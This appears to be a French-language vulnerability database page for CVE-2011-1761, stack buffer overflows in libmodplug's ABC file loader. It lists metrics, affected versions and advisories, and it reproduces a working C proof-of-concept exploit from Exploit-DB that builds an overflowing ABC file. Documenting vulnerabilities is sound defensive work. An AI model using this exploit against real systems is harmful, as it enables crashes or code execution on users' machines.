CVE-2011-1761 : Détail

CVE-2011-1761

Overflow
35%V4
Network
2012-06-07
19h00 +00:00
2012-06-07
19h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple stack-based buffer overflows in the (1) abc_new_macro and (2) abc_new_umacro functions in src/load_abc.cpp in libmodplug before 0.8.8.3 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted ABC file. NOTE: some of these details are obtained from third party information.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 17222

Date de publication : 2011-04-27 22h00 +00:00
Auteur : epiphant
EDB Vérifié : Yes

#include <libmodplug/modplug.h> #include <stdio.h> #include <string.h> /* libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc http://modplug-xmms.sourceforge.net/ by: epiphant this exploits one of many overflows in load_abc.cpp lol vlc media player uses libmodplug greets: defrost, babi, ming_wisher, emel1a, a.v., krs date: 28 april 2011 tested on: centos 5.6 */ int main(void) { char test[512] = "X: 1\nU: "; unsigned int i; i = strlen(test); while (i < 278) test[i++] = 'Q'; test[i++] = '1' + 32; test[i++] = '3'; test[i++] = '3'; test[i++] = '4'; while (i < 286) test[i++] = 'A'; test[i++] = '\n'; test[i] = '\0'; strcat(test, "T: Here Without You (Transcribed by: Bungee)\n"); strcat(test, "Z: 3 Doors Down\n"); strcat(test, "L: 1/4\n"); strcat(test, "Q: 108\n"); strcat(test, "K: C\n\n"); strcat(test, "[A,3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8]\n"); i = strlen(test); ModPlug_Load(test, i); return 0; }

Products Mentioned

Configuraton 0

Konstanty_bialkowski>>Libmodplug >> Version To (including) 0.8.8.2

Konstanty_bialkowski>>Libmodplug >> Version 0.8

Konstanty_bialkowski>>Libmodplug >> Version 0.8.4

Konstanty_bialkowski>>Libmodplug >> Version 0.8.5

Konstanty_bialkowski>>Libmodplug >> Version 0.8.6

Konstanty_bialkowski>>Libmodplug >> Version 0.8.7

Konstanty_bialkowski>>Libmodplug >> Version 0.8.8

Konstanty_bialkowski>>Libmodplug >> Version 0.8.8.1

Références

http://www.debian.org/security/2012/dsa-2415
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/44870
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/72157
Tags : vdb-entry, x_refsource_OSVDB
http://ubuntu.com/usn/usn-1148-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/44695
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/48058
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.exploit-db.com/exploits/17222
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/45742
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.openwall.com/lists/oss-security/2011/05/02/19
Tags : mailing-list, x_refsource_MLIST
http://www.openwall.com/lists/oss-security/2011/05/02/1
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/44388
Tags : third-party-advisory, x_refsource_SECUNIA